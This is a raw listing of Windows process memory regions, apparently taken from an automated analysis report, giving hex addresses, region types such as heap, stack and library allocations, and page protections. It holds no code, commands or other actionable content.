1FC2564C000
heap
page read and write
2B526760000
heap
page read and write
1CEF2687000
heap
page read and write
23AC5B66000
heap
page read and write
266F36E7000
heap
page read and write
1CEF25A0000
heap
page read and write
266F36DF000
heap
page read and write
1E8E403F000
heap
page read and write
1EA2311F000
heap
page read and write
1E8E4043000
heap
page read and write
1CEF20B9000
heap
page read and write
1E5FA670000
heap
page read and write
1EA2311F000
heap
page read and write
1FC2533A000
heap
page read and write
19BC6521000
heap
page read and write
1DD0FA93000
heap
page read and write
23AC6108000
heap
page read and write
1DEE7CBB000
heap
page read and write
23097CC0000
heap
page read and write
1E181C40000
heap
page read and write
20D43AFC000
heap
page read and write
236408C7000
heap
page read and write
266F36CF000
heap
page read and write
281FC3EC000
heap
page read and write
24BA397D000
heap
page read and write
26A1C3C0000
heap
page read and write
1E8E4047000
heap
page read and write
7FFB0C350000
unkown
page readonly
270D227C000
heap
page read and write
1DD0C7C3000
heap
page read and write
2484A144000
heap
page read and write
7FFB1BB24000
unkown
page execute and read and write
266F3083000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
2484A7EC000
heap
page read and write
23AC79ED000
heap
page read and write
1FC25556000
heap
page read and write
236408A5000
heap
page read and write
7FFAA97C0000
trusted library allocation
page read and write
1FC25D27000
heap
page read and write
1FC25652000
heap
page read and write
1E0E1583000
heap
page read and write
7FFB0C291000
unkown
page execute read
2484A805000
heap
page read and write
202E5760000
heap
page read and write
281FC3F8000
heap
page read and write
15774FE000
stack
page read and write
8BBB8FC000
stack
page read and write
1C5500B0000
heap
page read and write
2364087F000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
1E8E34FE000
trusted library allocation
page read and write
1577AFE000
unkown
page readonly
1E8E4052000
heap
page read and write
267AA627000
trusted library allocation
page read and write
1FC25616000
heap
page read and write
1FC25646000
heap
page read and write
23DC3E72000
heap
page read and write
1FC22D89000
heap
page read and write
7FFB0C290000
unkown
page readonly
7FFB1E4C9000
unkown
page execute and read and write
281FC324000
heap
page read and write
28425E5E000
heap
page read and write
27E84CF9000
heap
page read and write
9A7652C000
stack
page read and write
1FC256CC000
heap
page read and write
1AD18B29000
heap
page read and write
2484C170000
heap
page read and write
1E0E2FB1000
heap
page read and write
1CEF209E000
heap
page read and write
2484A802000
heap
page read and write
7E7A67F000
stack
page read and write
1407B190000
heap
page read and write
266F3097000
heap
page read and write
1407B302000
heap
page read and write
2484A15E000
heap
page read and write
266F4F55000
heap
page read and write
281FC34E000
heap
page read and write
1FC252A2000
heap
page read and write
1C550180000
heap
page read and write
1FC25B6C000
direct allocation
page read and write
29AC2460000
heap
page read and write
270D2224000
heap
page read and write
1C55079C000
heap
page read and write
1DD0FAC8000
heap
page read and write
270D2249000
heap
page read and write
23AC6112000
heap
page read and write
1DEE7CBE000
heap
page read and write
7FFAA9590000
trusted library allocation
page read and write
1407BB00000
heap
page read and write
1CEF3F70000
heap
page read and write
1E8E3FF1000
heap
page read and write
281FC3F4000
heap
page read and write
1E0D6465000
heap
page read and write
27EA9A82000
heap
page read and write
26379E71000
heap
page read and write
1909D514000
heap
page read and write
1FC25332000
heap
page read and write
1FC25670000
heap
page read and write
1FC25641000
heap
page read and write
1E0E17E4000
heap
page read and write
1FC22D69000
heap
page read and write
1E5FA782000
heap
page read and write
1FC255D0000
heap
page read and write
23AC5B5C000
heap
page read and write
266F36BC000
heap
page read and write
7FFB0C5E8000
unkown
page execute and read and write
1EA2311F000
heap
page read and write
19DD4FF0000
heap
page read and write
1E4CF9E6000
heap
page read and write
E6BFCFC000
stack
page read and write
1C5500B8000
heap
page read and write
1E181D00000
heap
page read and write
1E8E3FFC000
heap
page read and write
1EA2311F000
heap
page read and write
1C550764000
heap
page read and write
1FC2559E000
heap
page read and write
2484A804000
heap
page read and write
27EA9A82000
heap
page read and write
1407CA90000
trusted library allocation
page read and write
7FFB0C290000
unkown
page readonly
1EA24AA0000
heap
page read and write
239FE7B9000
heap
page read and write
81CE07F000
stack
page read and write
7FFB0C2A6000
unkown
page readonly
1FC25686000
heap
page read and write
281FE17E000
heap
page read and write
20D43B06000
heap
page read and write
81CDE77000
stack
page read and write
1E8E3525000
trusted library allocation
page read and write
7FFAA9436000
trusted library allocation
page execute and read and write
7FFB0C2B5000
unkown
page readonly
1FC25652000
heap
page read and write
267A7754000
heap
page read and write
1CE587D1000
heap
page read and write
1AB5E520000
heap
page read and write
281FC358000
heap
page read and write
23AC5B6D000
heap
page read and write
2584DBF0000
heap
page read and write
23AC79E2000
heap
page read and write
1FC256A7000
heap
page read and write
7FF74EEF8000
unkown
page write copy
2637A020000
heap
page read and write
2484A0A0000
heap
page read and write
15769FE000
unkown
page readonly
135F0601000
heap
page read and write
1690F754000
heap
page read and write
1FC251C7000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
1C550799000
heap
page read and write
23195F10000
heap
page read and write
1E8E3518000
trusted library allocation
page read and write
76F4B0C000
stack
page read and write
7FFB0C291000
unkown
page execute read
9F33CFF000
stack
page read and write
2484C180000
heap
page read and write
23AC7B50000
heap
page read and write
23097D20000
heap
page read and write
CDBDCFF000
stack
page read and write
239E49D0000
trusted library allocation
page read and write
1FC2531B000
heap
page read and write
1DCE30F2000
heap
page read and write
23195FBD000
heap
page read and write
1DD0C80A000
heap
page read and write
2484A16A000
heap
page read and write
26395BB0000
heap
page read and write
1DEE7F40000
heap
page read and write
CDBDDFE000
stack
page read and write
1C55076A000
heap
page read and write
1FC22D3E000
heap
page read and write
1E0E1490000
heap
page read and write
23AC5AF0000
heap
page read and write
7FFB24ACE000
unkown
page read and write
1FC255A2000
heap
page read and write
7E7A6FF000
stack
page read and write
21B1BDA1000
heap
page read and write
1E0D6458000
heap
page read and write
E6C17FF000
stack
page read and write
23AC5AA0000
heap
page read and write
239E4A20000
heap
page read and write
1FC25E2D000
heap
page read and write
135F0800000
heap
page read and write
239E8424000
trusted library allocation
page read and write
7FFB0C2B5000
unkown
page readonly
1DD10500000
heap
page read and write
1FC25337000
heap
page read and write
D7414F4000
stack
page read and write
239E49B0000
trusted library allocation
page read and write
7FFAA9522000
trusted library allocation
page read and write
23195FD2000
heap
page read and write
2B526930000
heap
page read and write
19BC64F0000
heap
page read and write
1FC255F2000
heap
page read and write
1E0E15FD000
heap
page read and write
1C5500D2000
heap
page read and write
23AC60F4000
heap
page read and write
1FC256A5000
heap
page read and write
1FC25560000
heap
page read and write
7FF6DC700000
unkown
page readonly
1FC255D0000
heap
page read and write
9A8657E000
stack
page read and write
1FC25333000
heap
page read and write
239FE7E2000
heap
page read and write
267A7700000
trusted library allocation
page read and write
239E80DB000
trusted library allocation
page read and write
81D27FE000
stack
page read and write
22972EAB000
heap
page read and write
266F36E9000
heap
page read and write
1E0E15E5000
heap
page read and write
270D27B5000
heap
page read and write
20D43B0E000
heap
page read and write
1E0E15BA000
heap
page read and write
1E8E3518000
trusted library allocation
page read and write
1B3A8230000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1E8E4056000
heap
page read and write
9A768FF000
unkown
page read and write
1E5FA782000
heap
page read and write
266F306A000
heap
page read and write
1C5507A7000
heap
page read and write
19BC6500000
heap
page read and write
1FC24F50000
heap
page read and write
1FC2527D000
heap
page read and write
1DD0C80A000
heap
page read and write
270D218A000
heap
page read and write
2484A45E000
heap
page read and write
281FC409000
heap
page read and write
1AB5E1D0000
heap
page read and write
27EA9B80000
heap
page read and write
281FC3EE000
heap
page read and write
1C5500BC000
heap
page read and write
1690F75E000
heap
page read and write
CDBD977000
stack
page read and write
1C550119000
heap
page read and write
1407BB13000
heap
page read and write
51D45FE000
stack
page read and write
281FC333000
heap
page read and write
1FC25626000
heap
page read and write
73D26FF000
stack
page read and write
21B1BD8A000
heap
page read and write
1FC26120000
heap
page read and write
1FC25563000
heap
page read and write
7FF74EE70000
unkown
page readonly
1E8E41D4000
heap
page read and write
19BC66F0000
heap
page read and write
1CEF20A4000
heap
page read and write
1E8E4047000
heap
page read and write
1E8E41D7000
heap
page read and write
1FC25631000
heap
page read and write
1CEF20B7000
heap
page read and write
2CFCDDE000
stack
page read and write
270D2224000
heap
page read and write
7FFAA9354000
trusted library allocation
page read and write
1FC252B9000
heap
page read and write
7FFB1C3B0000
unkown
page readonly
1CEF1F70000
heap
page read and write
51D48FE000
stack
page read and write
15C999C0000
heap
page read and write
266F30AD000
heap
page read and write
26379D90000
heap
page read and write
267AA616000
trusted library allocation
page read and write
886BFFF000
unkown
page read and write
1DEE7CAD000
heap
page read and write
281FC270000
trusted library allocation
page read and write
15777F9000
stack
page read and write
7FFB0C5EB000
unkown
page read and write
24B86AB0000
heap
page read and write
81CE17F000
stack
page read and write
267A76E0000
trusted library section
page read and write
1CEF20A8000
heap
page read and write
B2B88FE000
stack
page read and write
1FC25320000
heap
page read and write
7FFB0C3FE000
unkown
page execute and read and write
1E4CFA0F000
heap
page read and write
1FC22C90000
heap
page read and write
1CEF25AF000
heap
page read and write
1E0D6477000
heap
page read and write
1E0E1530000
heap
page read and write
2484A100000
heap
page read and write
7FFB18B7E000
unkown
page execute and read and write
270D2140000
trusted library allocation
page read and write
1AB5E250000
heap
page read and write
23AC60FA000
heap
page read and write
1AB5E524000
heap
page read and write
1E0D9B80000
direct allocation
page read and write
281FC51A000
heap
page read and write
1909D510000
heap
page read and write
270D4040000
heap
page read and write
1E0E155D000
heap
page read and write
1FC2577A000
heap
page read and write
1E0E1626000
heap
page read and write
7FFAA943C000
trusted library allocation
page execute and read and write
51D447E000
stack
page read and write
2940C604000
heap
page read and write
2BA38B21000
heap
page read and write
2BA9E644000
heap
page read and write
7FF6DC73E000
unkown
page write copy
1E0D6410000
heap
page read and write
1E0E1601000
heap
page read and write
281FC35D000
heap
page read and write
267C1790000
heap
page read and write
7FFAA95C0000
trusted library allocation
page read and write
236408A0000
heap
page read and write
608A0FF000
stack
page read and write
266F36C1000
heap
page read and write
1FC24F55000
heap
page read and write
1DD0E99E000
heap
page read and write
1CEF2076000
heap
page read and write
2DE1CC0A000
heap
page read and write
1CE587D1000
heap
page read and write
1C550119000
heap
page read and write
1AD18B31000
heap
page read and write
1DD0FAB4000
heap
page read and write
1FC24F4E000
heap
page read and write
1FC25680000
heap
page read and write
23AC79E6000
heap
page read and write
245456D0000
heap
page read and write
9E61FE000
stack
page read and write
7FF6DC73E000
unkown
page read and write
8F950FC000
stack
page read and write
1690F726000
heap
page read and write
1E182090000
heap
page read and write
7FFB18B70000
unkown
page readonly
1FC25368000
heap
page read and write
19BC6521000
heap
page read and write
267A95DF000
trusted library allocation
page read and write
73D27FF000
stack
page read and write
28425DD4000
heap
page read and write
F516CFF000
stack
page read and write
CC92DFB000
stack
page read and write
1AD18A94000
heap
page read and write
7FFB0BABD000
unkown
page execute and read and write
1E0D9B40000
direct allocation
page read and write
270D2187000
heap
page read and write
1407C170000
trusted library section
page readonly
1E0E15D0000
heap
page read and write
7FF74EF18000
unkown
page readonly
13C87870000
heap
page read and write
1E0E1571000
heap
page read and write
267AA95A000
trusted library allocation
page read and write
1E0D645B000
heap
page read and write
1CEF1E90000
heap
page read and write
23640850000
heap
page read and write
1AD189A0000
heap
page read and write
1DD0C80A000
heap
page read and write
1FC22D40000
heap
page read and write
1E0E17E0000
heap
page read and write
2422BE00000
heap
page read and write
2584DAD8000
heap
page read and write
1E0E1624000
heap
page read and write
270D220F000
heap
page read and write
23AC60FE000
heap
page read and write
1CEF2092000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
267AA9EE000
trusted library allocation
page read and write
15779FB000
stack
page read and write
1CEF2049000
heap
page read and write
1FC24EE6000
heap
page read and write
1CB96DC0000
heap
page read and write
2940C327000
heap
page read and write
1FC255C2000
heap
page read and write
267AA41A000
trusted library allocation
page read and write
2584DAE0000
heap
page read and write
267A7960000
heap
page read and write
1DD0C75E000
heap
page read and write
266F3075000
heap
page read and write
236408C7000
heap
page read and write
1A2CE4F0000
heap
page read and write
270D2182000
heap
page read and write
266F36AA000
heap
page read and write
1FC2560E000
heap
page read and write
281FC2F2000
heap
page read and write
7FFB0B875000
unkown
page execute and read and write
270D2259000
heap
page read and write
1AB5E2A5000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1FC22D23000
heap
page read and write
1E181CF7000
heap
page read and write
1CEF2097000
heap
page read and write
1F52B8CB000
heap
page read and write
1A2CE3D0000
heap
page read and write
1C550095000
heap
page read and write
25D4E340000
heap
page read and write
1FC22D69000
heap
page read and write
1700B890000
heap
page read and write
1FC25601000
heap
page read and write
270D2267000
heap
page read and write
1C5500A3000
heap
page read and write
1DEE7C8C000
heap
page read and write
7FFB0C291000
unkown
page execute read
13C87980000
heap
page read and write
281FC51E000
heap
page read and write
270D245D000
heap
page read and write
1FC2531D000
heap
page read and write
1CEF3F75000
heap
page read and write
23AC6111000
heap
page read and write
2484A7EC000
heap
page read and write
2484A152000
heap
page read and write
202E5710000
heap
page read and write
1EA2311F000
heap
page read and write
1DD0E99E000
heap
page read and write
270D2222000
heap
page read and write
23195FB0000
heap
page read and write
266F3097000
heap
page read and write
579A987000
stack
page read and write
1CEF2092000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1E8E41C0000
heap
page read and write
281FC3FB000
heap
page read and write
1C5500B0000
heap
page read and write
2090A8F0000
heap
page read and write
8F1C0CB000
stack
page read and write
7FFB0C2B0000
unkown
page read and write
1CEF20BE000
heap
page read and write
1F52B8C0000
heap
page read and write
130ECFF000
stack
page read and write
7FFB1BB2E000
unkown
page read and write
76BB6F6000
stack
page read and write
1FC255AE000
heap
page read and write
1FC25652000
heap
page read and write
1E0E1593000
heap
page read and write
1A2CE3D0000
heap
page read and write
1FC25BE8000
direct allocation
page read and write
1C550150000
trusted library allocation
page read and write
23AC5B56000
heap
page read and write
1E0D9920000
direct allocation
page read and write
1FC25635000
heap
page read and write
1FC26500000
heap
page read and write
1DEE7C30000
heap
page read and write
1FC24F55000
heap
page read and write
23AC5AFE000
heap
page read and write
1C5500AB000
heap
page read and write
1E8E34F9000
trusted library allocation
page read and write
51D544E000
stack
page read and write
23AC6129000
heap
page read and write
1E0D6465000
heap
page read and write
1FC251C9000
heap
page read and write
1E8E34FE000
trusted library allocation
page read and write
1FC25FC7000
heap
page read and write
2484C18D000
heap
page read and write
7FFB1AB12000
unkown
page execute and read and write
2484C183000
heap
page read and write
17FCF062000
heap
page read and write
9F33AFC000
stack
page read and write
1CEF1FB0000
trusted library allocation
page read and write
267C1C10000
heap
page read and write
1DEE7C87000
heap
page read and write
1AB5E2A3000
heap
page read and write
23AC60F7000
heap
page read and write
92C187F000
stack
page read and write
239E4918000
heap
page read and write
1E0D7EA7000
direct allocation
page read and write
1E8E4047000
heap
page read and write
267AA62B000
trusted library allocation
page read and write
281FC331000
heap
page read and write
1E4CF9EB000
heap
page read and write
4B74BCC000
stack
page read and write
281FC350000
heap
page read and write
1FC2531F000
heap
page read and write
20C72DA9000
heap
page read and write
1FC25692000
heap
page read and write
2584DBF5000
heap
page read and write
1FC255B2000
heap
page read and write
79002FE000
unkown
page read and write
281FC331000
heap
page read and write
1FC22D69000
heap
page read and write
1FC255E0000
heap
page read and write
281FC3FB000
heap
page read and write
2364087B000
heap
page read and write
7FFB1C3C6000
unkown
page read and write
1AB5E272000
heap
page read and write
1B3A8248000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1E0E15B6000
heap
page read and write
1FC2561E000
heap
page read and write
2484A15E000
heap
page read and write
2322B430000
heap
page read and write
1CE588D0000
heap
page read and write
1E0D64D8000
heap
page read and write
7FFB0BFE8000
unkown
page read and write
267A76F0000
trusted library section
page read and write
2484A7F9000
heap
page read and write
7FFAA9353000
trusted library allocation
page execute and read and write
1CB96E10000
heap
page read and write
270D227C000
heap
page read and write
23AC60F3000
heap
page read and write
1909D570000
heap
page read and write
87C027E000
stack
page read and write
281FC33A000
heap
page read and write
19DD4E90000
heap
page read and write
6C084DC000
stack
page read and write
C602EFC000
stack
page read and write
23097C90000
heap
page read and write
135F05F9000
heap
page read and write
281FC3FB000
heap
page read and write
2090A7D0000
heap
page read and write
1CEF2687000
heap
page read and write
19BC66D0000
heap
page read and write
266F3030000
heap
page read and write
1E0E15F1000
heap
page read and write
7FF6DC701000
unkown
page execute read
21B1C064000
heap
page read and write
23097D38000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
7FFAA9440000
trusted library allocation
page execute and read and write
1E8E402B000
heap
page read and write
1FC22D75000
heap
page read and write
1DD0E0AE000
heap
page read and write
1FC2526D000
heap
page read and write
F516AFC000
stack
page read and write
2484A17D000
heap
page read and write
13C876A1000
heap
page read and write
1E5FA9A0000
heap
page read and write
1E0E1601000
heap
page read and write
81CDEFE000
stack
page read and write
270D27D9000
heap
page read and write
1E0E15D6000
heap
page read and write
239E8428000
trusted library allocation
page read and write
1690F75F000
heap
page read and write
270D218E000
heap
page read and write
23DC3E5B000
heap
page read and write
24B86A40000
heap
page read and write
601B2FF000
unkown
page read and write
239E48BB000
heap
page read and write
1E0E15E5000
heap
page read and write
267A9111000
trusted library allocation
page read and write
5C55FF000
unkown
page read and write
C063BFF000
unkown
page read and write
1E182094000
heap
page read and write
266F3085000
heap
page read and write
1FC25361000
heap
page read and write
7FFB0D720000
unkown
page readonly
1E0D7FB4000
heap
page read and write
1DD0C80E000
heap
page read and write
281FC512000
heap
page read and write
1FC25569000
heap
page read and write
1FC24F48000
heap
page read and write
73D267F000
stack
page read and write
23AC79F4000
heap
page read and write
E6C139F000
stack
page read and write
7FFB0C2B2000
unkown
page readonly
1AD18B10000
heap
page read and write
20D43B0B000
heap
page read and write
28425E6C000
heap
page read and write
270D27B8000
heap
page read and write
28425E62000
heap
page read and write
1FC24B30000
direct allocation
page read and write
266F3047000
heap
page read and write
2484A7FC000
heap
page read and write
1C550784000
heap
page read and write
1FC25320000
heap
page read and write
25D4E110000
heap
page read and write
1FC255E0000
heap
page read and write
1FC25AA0000
direct allocation
page read and write
23AC5B4E000
heap
page read and write
7FFB1C266000
unkown
page execute and write copy
281FC3FB000
heap
page read and write
28425E48000
heap
page read and write
1E7B5F7B000
heap
page read and write
266F3091000
heap
page read and write
1FC252EB000
heap
page read and write
7FFAA9670000
trusted library allocation
page read and write
1407C900000
heap
page read and write
1E4CFC80000
heap
page read and write
2BA38E54000
heap
page read and write
19DD4EFA000
heap
page read and write
270D4054000
heap
page read and write
1E0E1628000
heap
page read and write
1700B7F0000
heap
page read and write
2090A7F8000
heap
page read and write
26395BB0000
heap
page read and write
1E0E160D000
heap
page read and write
20D43ADB000
heap
page read and write
1E8E4052000
heap
page read and write
19DD5154000
heap
page read and write
267A7904000
heap
page read and write
1407BA15000
heap
page read and write
1FC255FA000
heap
page read and write
267A76C0000
heap
page read and write
1FC24F2D000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
1407C780000
trusted library allocation
page read and write
1FC25646000
heap
page read and write
1C552013000
heap
page read and write
D5946FF000
stack
page read and write
17FCEFB0000
heap
page read and write
23195FD2000
heap
page read and write
266F3085000
heap
page read and write
76F4EFF000
unkown
page read and write
15762F7000
stack
page read and write
1FC25742000
heap
page read and write
1FC251A9000
heap
page read and write
1FC22D1B000
heap
page read and write
22972D00000
heap
page read and write
1FC25564000
heap
page read and write
7FFB0C613000
unkown
page read and write
E6C177E000
stack
page read and write
1690F74E000
heap
page read and write
19BC6794000
heap
page read and write
239E6410000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
D213DBF000
stack
page read and write
E6C16FE000
stack
page read and write
1E0D9A40000
direct allocation
page read and write
1CEF25A0000
heap
page read and write
281FE2F0000
heap
page read and write
267A78E0000
heap
page execute and read and write
1FC252EE000
heap
page read and write
1FC22D12000
heap
page read and write
2BA38AE0000
heap
page read and write
1EA2312C000
heap
page read and write
1576F7E000
stack
page read and write
2BA38B21000
heap
page read and write
1E0E1570000
heap
page read and write
1FC25602000
heap
page read and write
1E4CF9F8000
heap
page read and write
1407C800000
heap
page read and write
1FC256C6000
heap
page read and write
1E181C20000
heap
page read and write
25D4E150000
heap
page read and write
1FC255BF000
heap
page read and write
28425E5F000
heap
page read and write
1FC2555E000
heap
page read and write
601AF8C000
stack
page read and write
15780FE000
unkown
page readonly
B2B89FF000
stack
page read and write
27E84CB0000
heap
page read and write
202E576A000
heap
page read and write
7FFAA9466000
trusted library allocation
page execute and read and write
78FFF5B000
stack
page read and write
1DD0FB1B000
heap
page read and write
1EA2311F000
heap
page read and write
1FC25698000
heap
page read and write
1E0D9BAD000
direct allocation
page read and write
1FC2533D000
heap
page read and write
1FC253A3000
heap
page read and write
270D227C000
heap
page read and write
1FC252B9000
heap
page read and write
1C550150000
trusted library allocation
page read and write
28425E6C000
heap
page read and write
267A7719000
heap
page read and write
1C550135000
heap
page read and write
73D23C8000
stack
page read and write
157717E000
stack
page read and write
20C72D90000
heap
page read and write
7FFB0B811000
unkown
page execute and read and write
1407B28F000
heap
page read and write
1DD0C804000
heap
page read and write
1690F75B000
heap
page read and write
23DC4020000
heap
page read and write
1CEF3F71000
heap
page read and write
1EA2311F000
heap
page read and write
1FC25C34000
direct allocation
page read and write
81D277E000
stack
page read and write
19BC650B000
heap
page read and write
1407CAF0000
remote allocation
page read and write
1FC255B2000
heap
page read and write
1FC25602000
heap
page read and write
1DD0FAE0000
heap
page read and write
1E0D9AD6000
direct allocation
page read and write
1FC25656000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
23AC6115000
heap
page read and write
22972EC2000
heap
page read and write
8F1C14F000
stack
page read and write
1DD0C80E000
heap
page read and write
1FC22D86000
heap
page read and write
1FC25680000
heap
page read and write
24B86A60000
heap
page read and write
1CEF20A6000
heap
page read and write
2422BE00000
heap
page read and write
1FC255B2000
heap
page read and write
1E0E15D0000
heap
page read and write
1E4CF900000
heap
page read and write
1AB5E0D0000
heap
page read and write
1E0E1628000
heap
page read and write
1FC22CAD000
heap
page read and write
1C550130000
heap
page read and write
1E0E15FF000
heap
page read and write
1DD0C739000
heap
page read and write
1E5FA782000
heap
page read and write
1E0E15D0000
heap
page read and write
245455D0000
heap
page read and write
2940C1A0000
heap
page read and write
2484A809000
heap
page read and write
1DEE7CB2000
heap
page read and write
1690F74D000
heap
page read and write
1E0E15BA000
heap
page read and write
76BB679000
stack
page read and write
1407C8EF000
heap
page read and write
2484A173000
heap
page read and write
1E0E15D6000
heap
page read and write
1E0D64AF000
heap
page read and write
1DCE3060000
heap
page read and write
20D43AA0000
heap
page read and write
24545613000
heap
page read and write
2484A7D8000
heap
page read and write
23AC5B41000
heap
page read and write
1E8E402B000
heap
page read and write
7FFB0D721000
unkown
page execute read
281FC54B000
heap
page read and write
1E0D9B12000
direct allocation
page read and write
23AC5B52000
heap
page read and write
1E7B5ED0000
heap
page read and write
25D4E17A000
heap
page read and write
266F3000000
heap
page read and write
267C15D3000
heap
page read and write
1DD0F9F0000
heap
page read and write
23AC6113000
heap
page read and write
1FC26019000
heap
page read and write
266F3085000
heap
page read and write
7E7A77E000
stack
page read and write
1FC255D0000
heap
page read and write
244EE0CB000
heap
page read and write
2322B430000
heap
page read and write
1407C6C0000
trusted library allocation
page read and write
2484A452000
heap
page read and write
1EA2311F000
heap
page read and write
19BC67A0000
heap
page read and write
1E0E15F1000
heap
page read and write
281FC343000
heap
page read and write
1407C81F000
heap
page read and write
1EA2311F000
heap
page read and write
1DEE7CAC000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
1E8E34FE000
trusted library allocation
page read and write
1CEF25A9000
heap
page read and write
1FC251B0000
heap
page read and write
272B4FF000
stack
page read and write
1FC24F4F000
heap
page read and write
1A2CE3C7000
heap
page read and write
135F0590000
heap
page read and write
7DF448CA0000
trusted library allocation
page execute and read and write
8F79C7E000
stack
page read and write
1E8E3510000
trusted library allocation
page read and write
7FFB1C267000
unkown
page read and write
C0386FC000
stack
page read and write
2637A160000
heap
page read and write
2422BE00000
heap
page read and write
1FC25BB0000
direct allocation
page read and write
239F6A52000
trusted library allocation
page read and write
1690F75B000
heap
page read and write
272B3FF000
unkown
page read and write
270D2184000
heap
page read and write
1DEE7C99000
heap
page read and write
1CE58910000
heap
page read and write
267C16E0000
trusted library allocation
page read and write
23AC5B36000
heap
page read and write
27E84FF0000
heap
page read and write
1FC255A5000
heap
page read and write
23195FD2000
heap
page read and write
20D43AF8000
heap
page read and write
8F1C57E000
stack
page read and write
1FC2566E000
heap
page read and write
1A2CE3D0000
heap
page read and write
2B526740000
heap
page read and write
1FC25441000
heap
page read and write
1CEF25A9000
heap
page read and write
23DC40E4000
heap
page read and write
8F951FF000
unkown
page read and write
1E0E30A0000
heap
page read and write
270D224A000
heap
page read and write
7FFAA95F0000
trusted library allocation
page read and write
1C5500A1000
heap
page read and write
2584DC00000
heap
page read and write
281FC31F000
heap
page read and write
15C999D0000
heap
page read and write
270D2190000
heap
page read and write
20C72CB0000
heap
page read and write
7FFAA9620000
trusted library allocation
page read and write
7FFAA9562000
trusted library allocation
page read and write
239E4850000
heap
page read and write
28425D40000
heap
page read and write
157767E000
unkown
page readonly
20D43AD5000
heap
page read and write
1FC24E8D000
heap
page read and write
25D4E170000
heap
page read and write
1C552012000
heap
page read and write
1FC22D6A000
heap
page read and write
1FC25685000
heap
page read and write
29AC2440000
heap
page read and write
2584DBC0000
heap
page read and write
270D2266000
heap
page read and write
24BA38B0000
heap
page read and write
2484A45B000
heap
page read and write
7FFB0B7A3000
unkown
page execute and read and write
1576BFE000
unkown
page readonly
7FFB1AB00000
unkown
page readonly
2090A6F0000
heap
page read and write
26395B90000
heap
page read and write
1CB96E29000
heap
page read and write
51D47FA000
stack
page read and write
270D2232000
heap
page read and write
1FC24F56000
heap
page read and write
1FC256B8000
heap
page read and write
266F36CF000
heap
page read and write
1DD10600000
heap
page read and write
267AAF34000
trusted library allocation
page read and write
1FC252E8000
heap
page read and write
1E8E403F000
heap
page read and write
1407C6A1000
trusted library allocation
page read and write
1FC25564000
heap
page read and write
2484A457000
heap
page read and write
1407C8E5000
heap
page read and write
23097D42000
heap
page read and write
1FC256B8000
heap
page read and write
1FC256CC000
heap
page read and write
1E8E3530000
heap
page read and write
17FCF062000
heap
page read and write
7FFB0C5E3000
unkown
page execute and read and write
1FC24F69000
heap
page read and write
1FC25558000
heap
page read and write
51D54CD000
stack
page read and write
1FC255A7000
heap
page read and write
1C550135000
heap
page read and write
28425E5D000
heap
page read and write
1FC25F88000
heap
page read and write
1FC24E8C000
heap
page read and write
1AB5E1B0000
heap
page read and write
1FC25641000
heap
page read and write
1E4CFA1B000
heap
page read and write
1FC2559D000
heap
page read and write
1FC22C80000
heap
page read and write
239E6292000
heap
page read and write
1E0E1520000
trusted library allocation
page read and write
1E7B5F91000
heap
page read and write
1EA2311F000
heap
page read and write
7FF74EF04000
unkown
page read and write
26395D60000
heap
page read and write
1CEF3F85000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1DD0C710000
heap
page read and write
13C876A1000
heap
page read and write
7FFB0BE98000
unkown
page execute and read and write
2DE1CC21000
heap
page read and write
1E8E3525000
trusted library allocation
page read and write
20D43B00000
heap
page read and write
236407B0000
heap
page read and write
1FC25652000
heap
page read and write
1EA24C25000
heap
page read and write
1DD0C80A000
heap
page read and write
270D223D000
heap
page read and write
1E0D64DA000
heap
page read and write
1CEF25A0000
heap
page read and write
7FFB0BFA9000
unkown
page execute and read and write
1E5FA782000
heap
page read and write
1E0E1615000
heap
page read and write
1E5FA990000
heap
page read and write
1FC25635000
heap
page read and write
1AB5E282000
heap
page read and write
E45F8C000
stack
page read and write
1DEE7E30000
heap
page read and write
1E8E3FFA000
heap
page read and write
1E0D9B10000
direct allocation
page read and write
267A7820000
trusted library allocation
page read and write
1C55076A000
heap
page read and write
239F6A60000
trusted library allocation
page read and write
22972DE0000
heap
page read and write
7FFB0C290000
unkown
page readonly
7FFB0C2B0000
unkown
page read and write
270D2222000
heap
page read and write
2C25EF19000
heap
page read and write
1E8E41DA000
heap
page read and write
1FC255E0000
heap
page read and write
A42D5FF000
stack
page read and write
2484A48D000
heap
page read and write
1CEF207C000
heap
page read and write
239FE9E0000
heap
page read and write
13C876A1000
heap
page read and write
1407BB02000
heap
page read and write
2484A173000
heap
page read and write
1FC25602000
heap
page read and write
28425E6C000
heap
page read and write
1CE588B0000
heap
page read and write
1DD0C792000
heap
page read and write
1E8E404A000
heap
page read and write
1C290FF000
stack
page read and write
281FC3F3000
heap
page read and write
1FC26126000
heap
page read and write
1E0D9AA0000
direct allocation
page read and write
2484A16C000
heap
page read and write
1C5507A2000
heap
page read and write
7FFAA9370000
trusted library allocation
page read and write
51D41BF000
stack
page read and write
1DD0F5B0000
heap
page read and write
7FFB0D745000
unkown
page readonly
267A7660000
heap
page read and write
1407C8B0000
trusted library allocation
page read and write
1FC2538D000
heap
page read and write
267A9E52000
trusted library allocation
page read and write
23AC5B68000
heap
page read and write
267C1923000
heap
page read and write
1DD0E99E000
heap
page read and write
7FFAA9510000
trusted library allocation
page execute and read and write
7FFAA95B0000
trusted library allocation
page read and write
51C2DFF000
stack
page read and write
1FC25646000
heap
page read and write
23AC5B57000
heap
page read and write
1DD0C670000
heap
page read and write
1CEF2087000
heap
page read and write
19DD4D90000
heap
page read and write
1FC22D21000
heap
page read and write
1E0E1615000
heap
page read and write
7FFAA9352000
trusted library allocation
page read and write
2584DAD7000
heap
page read and write
2322B3B0000
heap
page read and write
1CEF20BE000
heap
page read and write
1DD0FAE0000
heap
page read and write
1DCE30F2000
heap
page read and write
28425E68000
heap
page read and write
267C168F000
heap
page read and write
F516BFF000
unkown
page read and write
1E0D6465000
heap
page read and write
1E0E30AD000
heap
page read and write
1700BB50000
heap
page read and write
1DD0E99E000
heap
page read and write
2422BE00000
heap
page read and write
270D21D9000
heap
page read and write
